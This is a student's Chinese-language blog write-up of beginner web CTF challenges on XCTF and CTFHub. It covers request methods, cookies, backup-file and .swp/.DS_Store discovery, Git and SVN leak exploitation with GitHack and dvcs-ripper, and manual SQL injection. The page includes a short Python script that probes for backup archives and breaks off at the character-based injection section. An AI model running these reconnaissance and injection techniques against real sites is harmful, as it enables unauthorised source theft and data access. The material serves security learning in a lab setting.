<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <meta name="keywords" content="Hexo Theme Redefine">
    
    <meta name="author" content="dawn_r1sing">
    <!-- preconnect -->
    <link rel="preconnect" href="https://fonts.googleapis.com">
    <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>

    
    <!--- Seo Part-->
    
    <link rel="canonical" href="http://example.com/2023/10/29/week1/"/>
    <meta name="robots" content="index,follow">
    <meta name="googlebot" content="index,follow">
    <meta name="revisit-after" content="1 days">
    
        <meta name="description" content="第一周和第二周1.web基础知识攻防世界 - get_post- 简单http两种请求方法 GET  POST  得到flag~  攻防世界- view_source -简单打开环境后查看页面源代码，发现右键不管用了，那就换种方式查看。 按F12-查看器即可获得flag~   攻防世界 disabled-button 简单题目的名字是“不能用的按钮”，那把它变成能用的不就行了。  和它”不能用”有">
<meta property="og:type" content="article">
<meta property="og:title" content="week1">
<meta property="og:url" content="http://example.com/2023/10/29/week1/index.html">
<meta property="og:site_name" content="Hexo">
<meta property="og:description" content="第一周和第二周1.web基础知识攻防世界 - get_post- 简单http两种请求方法 GET  POST  得到flag~  攻防世界- view_source -简单打开环境后查看页面源代码，发现右键不管用了，那就换种方式查看。 按F12-查看器即可获得flag~   攻防世界 disabled-button 简单题目的名字是“不能用的按钮”，那把它变成能用的不就行了。  和它”不能用”有">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="https://raw.githubusercontent.com/dawnrisingDong/pic_bed/main/img/202310150942217.bmp">
<meta property="og:image" content="https://raw.githubusercontent.com/dawnrisingDong/pic_bed/main/img/202310150956436.bmp">
<meta property="og:image" content="https://raw.githubusercontent.com/dawnrisingDong/pic_bed/main/img/202310151001761.bmp">
<meta property="og:image" content="https://raw.githubusercontent.com/dawnrisingDong/pic_bed/main/img/202310151027214.png">
<meta property="og:image" content="https://raw.githubusercontent.com/dawnrisingDong/pic_bed/main/img/202310151032789.bmp">
<meta property="og:image" content="https://raw.githubusercontent.com/dawnrisingDong/pic_bed/main/img/202310151042046.bmp">
<meta property="og:image" content="https://raw.githubusercontent.com/dawnrisingDong/pic_bed/main/img/202310151042645.bmp">
<meta property="og:image" content="https://raw.githubusercontent.com/dawnrisingDong/pic_bed/main/img/202310151059028.bmp">
<meta property="og:image" content="https://raw.githubusercontent.com/dawnrisingDong/pic_bed/main/img/202310160955884.png">
<meta property="og:image" content="https://raw.githubusercontent.com/dawnrisingDong/pic_bed/main/img/202310160955451.png">
<meta property="og:image" content="https://raw.githubusercontent.com/dawnrisingDong/pic_bed/main/img/202310160953579.bmp">
<meta property="og:image" content="https://raw.githubusercontent.com/dawnrisingDong/pic_bed/main/img/202310161002135.png">
<meta property="og:image" content="https://raw.githubusercontent.com/dawnrisingDong/pic_bed/main/img/202310161015308.bmp">
<meta property="og:image" content="https://raw.githubusercontent.com/dawnrisingDong/pic_bed/main/img/202310161050305.png">
<meta property="og:image" content="https://raw.githubusercontent.com/dawnrisingDong/pic_bed/main/img/202310161501315.png">
<meta property="og:image" content="https://raw.githubusercontent.com/dawnrisingDong/pic_bed/main/img/202310161618606.png">
<meta property="og:image" content="https://raw.githubusercontent.com/dawnrisingDong/pic_bed/main/img/202310161621142.bmp">
<meta property="og:image" content="https://raw.githubusercontent.com/dawnrisingDong/pic_bed/main/img/202310161626286.png">
<meta property="og:image" content="https://raw.githubusercontent.com/dawnrisingDong/pic_bed/main/img/202310202107566.bmp">
<meta property="og:image" content="https://raw.githubusercontent.com/dawnrisingDong/pic_bed/main/img/202310161732263.png">
<meta property="og:image" content="https://raw.githubusercontent.com/dawnrisingDong/pic_bed/main/img/202310161733598.png">
<meta property="og:image" content="https://raw.githubusercontent.com/dawnrisingDong/pic_bed/main/img/202310161910452.png">
<meta property="og:image" content="https://raw.githubusercontent.com/dawnrisingDong/pic_bed/main/img/202310161931543.png">
<meta property="og:image" content="https://raw.githubusercontent.com/dawnrisingDong/pic_bed/main/img/202310161958205.bmp">
<meta property="og:image" content="https://raw.githubusercontent.com/dawnrisingDong/pic_bed/main/img/202310221524220.png">
<meta property="og:image" content="https://raw.githubusercontent.com/dawnrisingDong/pic_bed/main/img/202310162002784.bmp">
<meta property="og:image" content="https://raw.githubusercontent.com/dawnrisingDong/pic_bed/main/img/202310162018938.png">
<meta property="og:image" content="https://raw.githubusercontent.com/dawnrisingDong/pic_bed/main/img/202310162048315.png">
<meta property="og:image" content="https://raw.githubusercontent.com/dawnrisingDong/pic_bed/main/img/202310162023315.png">
<meta property="og:image" content="https://raw.githubusercontent.com/dawnrisingDong/pic_bed/main/img/202310162025234.png">
<meta property="og:image" content="https://raw.githubusercontent.com/dawnrisingDong/pic_bed/main/img/202310162027297.bmp">
<meta property="og:image" content="https://raw.githubusercontent.com/dawnrisingDong/pic_bed/main/img/202310162029190.png">
<meta property="og:image" content="https://raw.githubusercontent.com/dawnrisingDong/pic_bed/main/img/202310162032921.png">
<meta property="og:image" content="https://raw.githubusercontent.com/dawnrisingDong/pic_bed/main/img/202310162047747.png">
<meta property="og:image" content="https://raw.githubusercontent.com/dawnrisingDong/pic_bed/main/img/202310162111130.png">
<meta property="og:image" content="https://raw.githubusercontent.com/dawnrisingDong/pic_bed/main/img/202310162111214.png">
<meta property="og:image" content="https://raw.githubusercontent.com/dawnrisingDong/pic_bed/main/img/202310162112436.png">
<meta property="og:image" content="https://raw.githubusercontent.com/dawnrisingDong/pic_bed/main/img/202310162113231.png">
<meta property="og:image" content="https://raw.githubusercontent.com/dawnrisingDong/pic_bed/main/img/202310190852529.png">
<meta property="og:image" content="https://raw.githubusercontent.com/dawnrisingDong/pic_bed/main/img/202310190900303.png">
<meta property="og:image" content="https://raw.githubusercontent.com/dawnrisingDong/pic_bed/main/img/202310181559847.bmp">
<meta property="og:image" content="https://raw.githubusercontent.com/dawnrisingDong/pic_bed/main/img/202310181618933.bmp">
<meta property="og:image" content="https://raw.githubusercontent.com/dawnrisingDong/pic_bed/main/img/202310181619662.bmp">
<meta property="og:image" content="https://raw.githubusercontent.com/dawnrisingDong/pic_bed/main/img/202310181630973.png">
<meta property="og:image" content="https://raw.githubusercontent.com/dawnrisingDong/pic_bed/main/img/202310181659248.png">
<meta property="og:image" content="https://raw.githubusercontent.com/dawnrisingDong/pic_bed/main/img/202310181723146.png">
<meta property="og:image" content="https://raw.githubusercontent.com/dawnrisingDong/pic_bed/main/img/202310181737014.bmp">
<meta property="og:image" content="https://raw.githubusercontent.com/dawnrisingDong/pic_bed/main/img/202310182108872.png">
<meta property="og:image" content="https://raw.githubusercontent.com/dawnrisingDong/pic_bed/main/img/202310182120303.png">
<meta property="og:image" content="https://raw.githubusercontent.com/dawnrisingDong/pic_bed/main/img/202310182145323.bmp">
<meta property="og:image" content="https://raw.githubusercontent.com/dawnrisingDong/pic_bed/main/img/202310182146723.bmp">
<meta property="og:image" content="https://raw.githubusercontent.com/dawnrisingDong/pic_bed/main/img/202310182151473.jpeg">
<meta property="og:image" content="https://raw.githubusercontent.com/dawnrisingDong/pic_bed/main/img/202310182251524.png">
<meta property="og:image" content="https://raw.githubusercontent.com/dawnrisingDong/pic_bed/main/img/202310182207171.bmp">
<meta property="og:image" content="https://raw.githubusercontent.com/dawnrisingDong/pic_bed/main/img/202310182208611.bmp">
<meta property="og:image" content="https://raw.githubusercontent.com/dawnrisingDong/pic_bed/main/img/202310221524539.bmp">
<meta property="og:image" content="https://raw.githubusercontent.com/dawnrisingDong/pic_bed/main/img/202310182209377.bmp">
<meta property="og:image" content="https://raw.githubusercontent.com/dawnrisingDong/pic_bed/main/img/202310182210186.bmp">
<meta property="og:image" content="https://raw.githubusercontent.com/dawnrisingDong/pic_bed/main/img/202310182211510.bmp">
<meta property="og:image" content="https://raw.githubusercontent.com/dawnrisingDong/pic_bed/main/img/202310182219686.bmp">
<meta property="og:image" content="https://raw.githubusercontent.com/dawnrisingDong/pic_bed/main/img/202310182302153.png">
<meta property="og:image" content="https://raw.githubusercontent.com/dawnrisingDong/pic_bed/main/img/202310182312797.png">
<meta property="og:image" content="https://raw.githubusercontent.com/dawnrisingDong/pic_bed/main/img/202310201056302.bmp">
<meta property="og:image" content="https://raw.githubusercontent.com/dawnrisingDong/pic_bed/main/img/202310201118424.png">
<meta property="og:image" content="https://raw.githubusercontent.com/dawnrisingDong/pic_bed/main/img/202310201121532.png">
<meta property="og:image" content="https://raw.githubusercontent.com/dawnrisingDong/pic_bed/main/img/202310201450822.png">
<meta property="og:image" content="https://raw.githubusercontent.com/dawnrisingDong/pic_bed/main/img/202310201449522.png">
<meta property="og:image" content="https://raw.githubusercontent.com/dawnrisingDong/pic_bed/main/img/202310201454214.bmp">
<meta property="og:image" content="https://raw.githubusercontent.com/dawnrisingDong/pic_bed/main/img/202310201503371.png">
<meta property="og:image" content="https://raw.githubusercontent.com/dawnrisingDong/pic_bed/main/img/202310201644510.png">
<meta property="article:published_time" content="2023-10-29T06:56:07.000Z">
<meta property="article:modified_time" content="2023-10-29T07:06:09.619Z">
<meta property="article:author" content="John Doe">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://raw.githubusercontent.com/dawnrisingDong/pic_bed/main/img/202310150942217.bmp">
    
    
    <!--- Icon Part-->
    <link rel="icon" type="image/png" href="/images/redefine-favicon.svg" sizes="192x192">
    <link rel="apple-touch-icon" sizes="180x180" href="/images/redefine-favicon.svg">
    <meta name="theme-color" content="#A31F34">
    <link rel="shortcut icon" href="/images/redefine-favicon.svg">
    <!--- Page Info-->
    
    <title>
        
            week1 -
        
        dawn_r1sing
    </title>
    
<link rel="stylesheet" href="/css/style.css">


    
        
<link rel="stylesheet" href="/assets/build/styles.css">

    

    
<link rel="stylesheet" href="/fonts/fonts.css">

    
<link rel="stylesheet" href="/fonts/Satoshi/satoshi.css">

    
<link rel="stylesheet" href="/fonts/Chillax/chillax.css">

    <!--- Font Part-->
    
    
    
    

    <!--- Inject Part-->
    
    <script id="hexo-configurations">
    window.config = {"hostname":"example.com","root":"/","language":"en"};
    window.theme = {"articles":{"style":{"font_size":"16px","line_height":1.5,"image_border_radius":"14px","image_alignment":"center","image_caption":false,"link_icon":true},"word_count":{"enable":true,"count":true,"min2read":true},"author_label":{"enable":true,"auto":false,"list":[]},"code_block":{"copy":true,"style":"mac","font":{"enable":false,"family":null,"url":null}},"toc":{"enable":true,"max_depth":3,"number":false,"expand":true,"init_open":true},"copyright":true,"lazyload":true,"recommendation":{"enable":false,"title":"推荐阅读","limit":3,"mobile_limit":2,"placeholder":"/images/wallhaven-wqery6-light.webp","skip_dirs":[]}},"colors":{"primary":"#A31F34","secondary":null},"global":{"fonts":{"chinese":{"enable":false,"family":null,"url":null},"english":{"enable":false,"family":null,"url":null}},"content_max_width":"1000px","sidebar_width":"210px","hover":{"shadow":true,"scale":false},"scroll_progress":{"bar":false,"percentage":true},"website_counter":{"url":"https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js","enable":true,"site_pv":true,"site_uv":true,"post_pv":true},"single_page":true,"open_graph":true,"google_analytics":{"enable":false,"id":null}},"home_banner":{"enable":true,"style":"fixed","image":{"light":"/images/wallhaven-wqery6-light.webp","dark":"/images/wallhaven-wqery6-dark.webp"},"title":"Theme Redefine","subtitle":{"text":[],"hitokoto":{"enable":false,"api":"https://v1.hitokoto.cn"},"typing_speed":100,"backing_speed":80,"starting_delay":500,"backing_delay":1500,"loop":true,"smart_backspace":true},"text_color":{"light":"#fff","dark":"#d1d1b6"},"text_style":{"title_size":"2.8rem","subtitle_size":"1.5rem","line_height":1.2},"custom_font":{"enable":false,"family":null,"url":null},"social_links":{"enable":false,"links":{"github":null,"instagram":null,"zhihu":null,"twitter":null,"email":null},"qrs":{"weixin":null}}},"plugins":{"feed":{"enable":false},"aplayer":{"enable":false,"type":"fixed","audios":[{"name":null,"artist":null,"url":null,"cover":null}]},"mermaid":{"enable":false,"version":"9.3.0"}},"version":"2.5.0","navbar":{"auto_hide":false,"color":{"left":"#f78736","right":"#367df7","transparency":35},"links":{"Home":{"path":"/","icon":"fa-regular fa-house"}},"search":{"enable":false,"preload":true}},"page_templates":{"friends_column":2,"tags_style":"blur"},"home":{"sidebar":{"enable":true,"position":"left","first_item":"menu","announcement":null,"links":null},"article_date_format":"auto","categories":{"enable":true,"limit":3},"tags":{"enable":true,"limit":3}},"footerStart":"2022/8/17 11:45:14"};
    window.lang_ago = {"second":"%s seconds ago","minute":"%s minutes ago","hour":"%s hours ago","day":"%s days ago","week":"%s weeks ago","month":"%s months ago","year":"%s years ago"};
    window.data = {"masonry":false};
  </script>
    
    <!--- Fontawesome Part-->
    
<link rel="stylesheet" href="/fontawesome/fontawesome.min.css">

    
<link rel="stylesheet" href="/fontawesome/brands.min.css">

    
<link rel="stylesheet" href="/fontawesome/solid.min.css">

    
<link rel="stylesheet" href="/fontawesome/regular.min.css">

    
    
    
    
<meta name="generator" content="Hexo 6.3.0"></head>


<body>
<div class="progress-bar-container">
    

    
        <span class="pjax-progress-bar"></span>
        <span class="swup-progress-icon">
            <i class="fa-solid fa-circle-notch fa-spin"></i>
        </span>
    
</div>


<main class="page-container" id="swup">

    

    <div class="main-content-container">


        <div class="main-content-header">
            <header class="navbar-container">
    
    <div class="navbar-content">
        <div class="left">
            
                <a class="logo-image" href="/">
                    <img src="https://raw.githubusercontent.com/dawnrisingDong/pic_bed/main/img/202310291722919.bmp">
                </a>
            
            <a class="logo-title" href="/">
                
                dawn_r1sing
                
            </a>
        </div>

        <div class="right">
            <!-- PC -->
            <div class="desktop">
                <ul class="navbar-list">
                    
                        
                            <li class="navbar-item">
                                <!-- Menu -->
                                <a class="" 
                                    href="/"  >
                                    
                                        
                                            <i class="fa-regular fa-house"></i>
                                        
                                        HOME
                                    
                                </a>
                                <!-- Submenu -->
                                
                            </li>
                    
                    
                </ul>
            </div>
            <!-- Mobile -->
            <div class="mobile">
                
                <div class="icon-item navbar-bar">
                    <div class="navbar-bar-middle"></div>
                </div>
            </div>
        </div>
    </div>

    <!-- Mobile drawer -->
    <div class="navbar-drawer w-full absolute top-0 left-0 bg-background-color">
        <ul class="drawer-navbar-list flex flex-col justify-start items-center">
            
                
                    <li class="drawer-navbar-item text-base my-1.5 flex justify-center items-center">
                        <a class="rounded-3xl py-1.5 px-5 hover:border hover:!text-primary active:!text-primary group " 
                        href="/"  >
                             
                                
                                    <i class="fa-regular fa-house"></i>
                                
                                HOME
                            
                        </a>
                    </li>
                    <!-- Submenu -->
                    
            

        </ul>
    </div>

    <div class="window-mask"></div>

</header>


        </div>

        <div class="main-content-body">

            

            <div class="main-content">

                
                    <div class="post-page-container">
    <div class="article-content-container">

        <div class="article-title">
            
                <h1 class="article-title-regular">week1</h1>
            
            </div>
            
                    
        
        
            <div class="article-header flex flex-row gap-2 items-center">
                <div class="avatar w-[46px] h-[46px] flex-shrink-0 rounded-medium border border-border-color p-[1px]">
                    <img src="https://raw.githubusercontent.com/dawnrisingDong/pic_bed/main/img/202310291726035.jpg">
                </div>
                <div class="info flex flex-col justify-between">
                    <div class="author flex items-center">
                        <span class="name text-default-text-color text-lg font-semibold">dawn_r1sing</span>
                        
                            <span class="author-label ml-1.5 text-xs px-2 py-0.5 rounded-small text-third-text-color border border-shadow-color-1">Lv1</span>
                        
                    </div>
                    <div class="meta-info">
                        <div class="article-meta-info">
    <span class="article-date article-meta-item">
        <i class="fa-regular fa-pen-fancy"></i>&nbsp;
        <span class="desktop">2023-10-29 14:56:07</span>
        <span class="mobile">2023-10-29 14:56:07</span>
        <span class="hover-info">Created</span>
    </span>
    
        <span class="article-date article-meta-item">
            <i class="fa-regular fa-wrench"></i>&nbsp;
            <span class="desktop">2023-10-29 15:06:09</span>
            <span class="mobile">2023-10-29 15:06:09</span>
            <span class="hover-info">Updated</span>
        </span>
    

    
    

    
    
    
    
        <span class="article-pv article-meta-item">
            <i class="fa-regular fa-eye"></i>&nbsp;<span id="busuanzi_value_page_pv"></span>
        </span>
    
</div>

                    </div>
                </div>
            </div>
        

        


        <div class="article-content markdown-body">
            <h1 id="第一周和第二周"><a href="#第一周和第二周" class="headerlink" title="第一周和第二周"></a>第一周和第二周</h1><h2 id="1-web基础知识"><a href="#1-web基础知识" class="headerlink" title="1.web基础知识"></a>1.web基础知识</h2><h4 id="攻防世界-get-post-简单"><a href="#攻防世界-get-post-简单" class="headerlink" title="攻防世界 - get_post- 简单"></a>攻防世界 - get_post- 简单</h4><p>http两种请求方法</p>
<p>GET</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://raw.githubusercontent.com/dawnrisingDong/pic_bed/main/img/202310150942217.bmp"
                      alt="img"
                ></p>
<p>POST</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://raw.githubusercontent.com/dawnrisingDong/pic_bed/main/img/202310150956436.bmp"
                      alt="img"
                ></p>
<p>得到flag~</p>
<hr>
<h4 id="攻防世界-view-source-简单"><a href="#攻防世界-view-source-简单" class="headerlink" title="攻防世界- view_source -简单"></a>攻防世界- view_source -简单</h4><p>打开环境后查看页面源代码，发现右键不管用了，那就换种方式查看。</p>
<p>按F12-查看器即可获得flag~</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://raw.githubusercontent.com/dawnrisingDong/pic_bed/main/img/202310151001761.bmp"
                      alt="img"
                ></p>
<hr>
<h4 id="攻防世界-disabled-button-简单"><a href="#攻防世界-disabled-button-简单" class="headerlink" title="攻防世界 disabled-button 简单"></a>攻防世界 disabled-button 简单</h4><p>题目的名字是“不能用的按钮”，那把它变成能用的不就行了。</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://raw.githubusercontent.com/dawnrisingDong/pic_bed/main/img/202310151027214.png"
                      alt="img"
                ></p>
<p>和它”不能用”有关的东西就是<code>class=&quot;btn btn-default” disabled=&quot;&quot;</code> 这一串了，删掉它！</p>
<p>能按啦！</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://raw.githubusercontent.com/dawnrisingDong/pic_bed/main/img/202310151032789.bmp"
                      alt="img"
                ></p>
<p>得到flag~</p>
<hr>
<h4 id="攻防世界-cookie-简单"><a href="#攻防世界-cookie-简单" class="headerlink" title="攻防世界 - cookie -简单"></a>攻防世界 - cookie -简单</h4><p>题目就是一切~查看cookie</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://raw.githubusercontent.com/dawnrisingDong/pic_bed/main/img/202310151042046.bmp"
                      alt="img"
                ></p>
<p>进入cookie.php</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://raw.githubusercontent.com/dawnrisingDong/pic_bed/main/img/202310151042645.bmp"
                      alt="img"
                ></p>
<p>得到flag~</p>
<hr>
<h4 id="攻防世界-baby-web-中等"><a href="#攻防世界-baby-web-中等" class="headerlink" title="攻防世界 baby_web 中等"></a>攻防世界 baby_web 中等</h4><p>题目提示”初始页面“，打开环境后发现会自动跳转到1.php中，手动改成index.php，响应头中就有“FLAG“</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://raw.githubusercontent.com/dawnrisingDong/pic_bed/main/img/202310151059028.bmp"
                      alt="img"
                ></p>
<p>得到flag~</p>
<hr>
<h2 id="2-信息收集"><a href="#2-信息收集" class="headerlink" title="2.信息收集"></a>2.信息收集</h2><h4 id="目录遍历"><a href="#目录遍历" class="headerlink" title="目录遍历"></a>目录遍历</h4><div class="highlight-container" data-rel="Plaintext"><figure class="iseeu highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ctfhub&#123;2e433d01c64e0febd5a67a1a&#125;</span><br></pre></td></tr></table></figure></div>

<hr>
<h4 id="备份文件下载"><a href="#备份文件下载" class="headerlink" title="备份文件下载"></a>备份文件下载</h4><ul>
<li><p>网站源码</p>
<p>用一个简单的python脚本找一下文件</p>
<div class="highlight-container" data-rel="Python"><figure class="iseeu highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> requests</span><br><span class="line">url=<span class="string">&quot;http://challenge-ae98764d7ebc5438.sandbox.ctfhub.com:10800/&quot;</span></span><br><span class="line">list1=[<span class="string">&#x27;web&#x27;</span>, <span class="string">&#x27;website&#x27;</span>, <span class="string">&#x27;backup&#x27;</span>, <span class="string">&#x27;back&#x27;</span>, <span class="string">&#x27;www&#x27;</span>,  <span class="string">&#x27;wwwroot&#x27;</span>, <span class="string">&#x27;temp&#x27;</span>]</span><br><span class="line">list2=[<span class="string">&#x27;tar&#x27;</span>, <span class="string">&#x27;tar.gz&#x27;</span>, <span class="string">&#x27;zip&#x27;</span>, <span class="string">&#x27;rar&#x27;</span>]</span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> list1:</span><br><span class="line">    <span class="keyword">for</span> j <span class="keyword">in</span> list2:</span><br><span class="line">        url_f=url + i + <span class="string">&quot;.&quot;</span> + j</span><br><span class="line">        r = requests.get(url_f)</span><br><span class="line">        <span class="keyword">if</span> (r.status_code == <span class="number">200</span>):</span><br><span class="line">            <span class="built_in">print</span>(url_f)</span><br></pre></td></tr></table></figure></div></li>
</ul>
<p>得到<a class="link"   target="_blank" rel="noopener" href="http://challenge-ae98764d7ebc5438.sandbox.ctfhub.com:10800/www.zip" >http://challenge-ae98764d7ebc5438.sandbox.ctfhub.com:10800/www.zip <i class="fa-regular fa-arrow-up-right-from-square fa-sm"></i></a></p>
<p>下载得到文件 flag_2109710780.txt ，在网页中访问即可</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://raw.githubusercontent.com/dawnrisingDong/pic_bed/main/img/202310160955884.png"
                      alt="image-20231016093800606"
                ><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://raw.githubusercontent.com/dawnrisingDong/pic_bed/main/img/202310160955451.png"
                      alt="image-20231016093933406"
                ></p>
<p>得到flag~</p>
<ul>
<li><p>bak 文件</p>
<p>通过提示可知，flag在index.php中，且为bak文件，访问…&#x2F;index.php.bak即可</p>
<p>得到flag~</p>
</li>
<li><p>vim</p>
<p>vim -&gt; 文本编辑器 ，其中的swp文件用来备份缓冲区中的一种隐藏文件，编辑文件时会产生，文件正常退出就会删除。</p>
<p>故它的访问应为“.xx.swp”</p>
<p><strong>注意：因为是隐藏文件所以前面有“ . ”</strong></p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://raw.githubusercontent.com/dawnrisingDong/pic_bed/main/img/202310160953579.bmp"
                      alt="img"
                ></p>
</li>
</ul>
<p>​	打开：记事本（乱码中的flag）或 vim</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://raw.githubusercontent.com/dawnrisingDong/pic_bed/main/img/202310161002135.png"
                      alt="image-20231016100210635"
                ></p>
<p>得到flag~</p>
<ul>
<li><p>.DS_Store</p>
<p>.DS_Store 文件存储的是 当前文件夹在桌面显示相关方面的一些自定义属性，是一种隐藏文件，通过它可以知道该目录下所有文件的清单。</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://raw.githubusercontent.com/dawnrisingDong/pic_bed/main/img/202310161015308.bmp"
                      alt="capture_20231016101349069"
                ></p>
</li>
</ul>
<p>发现txt文件，访问！</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://raw.githubusercontent.com/dawnrisingDong/pic_bed/main/img/202310161050305.png"
                      alt="image-20231016105030501"
                ></p>
<p>得到flag~</p>
<hr>
<h4 id="Git泄露"><a href="#Git泄露" class="headerlink" title="Git泄露"></a>Git泄露</h4><ul>
<li>log</li>
</ul>
<p>dirsearch扫描发现git泄露</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://raw.githubusercontent.com/dawnrisingDong/pic_bed/main/img/202310161501315.png"
                      alt="image-20231016150129904"
                ></p>
<p>通过GitHack（.git泄露利用脚本）获取源代码</p>
<p>（先配置 git 、GitHack ）</p>
<p>GitHack 的使用 ： <code>python2 GitHack.py url + /.git</code>    (&#x2F;.git一开始给落下了懵了好久)</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://raw.githubusercontent.com/dawnrisingDong/pic_bed/main/img/202310161618606.png"
                      alt="image-20231016161856660"
                ></p>
<p>进入最后面显示的文件下，<code>git log</code>查找历史记录（题目名字log）</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://raw.githubusercontent.com/dawnrisingDong/pic_bed/main/img/202310161621142.bmp"
                      alt="capture_20231016160939165"
                ></p>
<p>第二条<code>add flag</code>是我们想要的</p>
<p>进入：</p>
<p>①<code>git diff &lt;commit&gt;</code></p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://raw.githubusercontent.com/dawnrisingDong/pic_bed/main/img/202310161626286.png"
                      alt="image-20231016162615554"
                ></p>
<p>②<code>git show</code></p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://raw.githubusercontent.com/dawnrisingDong/pic_bed/main/img/202310202107566.bmp"
                      alt="capture_20231016160949413"
                ></p>
<p>得到flag~</p>
<ul>
<li>stash</li>
</ul>
<p>前面的操作跟log一样</p>
<p>扫描发现git泄露</p>
<p>使用GitHack</p>
<p>再次根据题目名字 搜搜<code>stash</code>，发现它是一个将隐藏的东西拿出来的git操作</p>
<p><code>git stash apply </code></p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://raw.githubusercontent.com/dawnrisingDong/pic_bed/main/img/202310161732263.png"
                      alt="image-20231016173232139"
                ></p>
<p>文件夹中出现txt文件，打开</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://raw.githubusercontent.com/dawnrisingDong/pic_bed/main/img/202310161733598.png"
                      alt="image-20231016173325806"
                ></p>
<p>得到flag~</p>
<ul>
<li>index</li>
</ul>
<p>log的简化版，直接<code>git show</code>即可</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://raw.githubusercontent.com/dawnrisingDong/pic_bed/main/img/202310161910452.png"
                      alt="image-20231016191057181"
                ></p>
<hr>
<h4 id="SVN泄露"><a href="#SVN泄露" class="headerlink" title="SVN泄露"></a>SVN泄露</h4><p>“使用SVN管理本地代码过程中，将生成名为.svn的隐藏文件夹，包含非常重要的源码信息。当网站管理员在发布代码时，没有使用导出功能，直接进行复制粘贴，导致出现SVN信息泄露漏洞”</p>
<p>dirsearch 扫描发现SVN泄露</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://raw.githubusercontent.com/dawnrisingDong/pic_bed/main/img/202310161931543.png"
                      alt="image-20231016193155237"
                ></p>
<p>搜索“SVN泄露”，安装工具配置环境。。。</p>
<p>使用dvcs-ripper工具将泄露文件克隆到.svn&#x2F;pristine中</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://raw.githubusercontent.com/dawnrisingDong/pic_bed/main/img/202310161958205.bmp"
                      alt="img"
                ></p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://raw.githubusercontent.com/dawnrisingDong/pic_bed/main/img/202310221524220.png"
                      alt="image-20231016200036976"
                ></p>
<p>从这两个文件中找。。</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://raw.githubusercontent.com/dawnrisingDong/pic_bed/main/img/202310162002784.bmp"
                      alt="capture_20231016200150391"
                ></p>
<p>成功在<code>/3c</code>中得到flag~</p>
<hr>
<h2 id="3-SQL注入-手工注入"><a href="#3-SQL注入-手工注入" class="headerlink" title="3.SQL注入(手工注入)"></a>3.SQL注入(手工注入)</h2><ul>
<li><h4 id="整数型注入"><a href="#整数型注入" class="headerlink" title="整数型注入"></a>整数型注入</h4></li>
</ul>
<p>根据提示先输入<code>1</code></p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://raw.githubusercontent.com/dawnrisingDong/pic_bed/main/img/202310162018938.png"
                      alt="image-20231016201849017"
                ></p>
<p><code>1 order by 2</code>试列数，有两列</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://raw.githubusercontent.com/dawnrisingDong/pic_bed/main/img/202310162048315.png"
                      alt="image-20231016204823967"
                ></p>
<p>寻找注入点，是Data: 2！</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://raw.githubusercontent.com/dawnrisingDong/pic_bed/main/img/202310162023315.png"
                      alt="image-20231016202333206"
                ></p>
<p>找数据库</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://raw.githubusercontent.com/dawnrisingDong/pic_bed/main/img/202310162025234.png"
                      alt="image-20231016202459602"
                ></p>
<p>找表</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://raw.githubusercontent.com/dawnrisingDong/pic_bed/main/img/202310162027297.bmp"
                      alt="img"
                ></p>
<p>找字段</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://raw.githubusercontent.com/dawnrisingDong/pic_bed/main/img/202310162029190.png"
                      alt="image-20231016202931266"
                ></p>
<p>找字段内容</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://raw.githubusercontent.com/dawnrisingDong/pic_bed/main/img/202310162032921.png"
                      alt="image-20231016203233478"
                ></p>
<p>得到flag~</p>
<hr>
<ul>
<li><h4 id="字符型注入"><a href="#字符型注入" class="headerlink" title="字符型注入"></a>字符型注入</h4></li>
</ul>
<p>基本步骤同上</p>
<p><img  
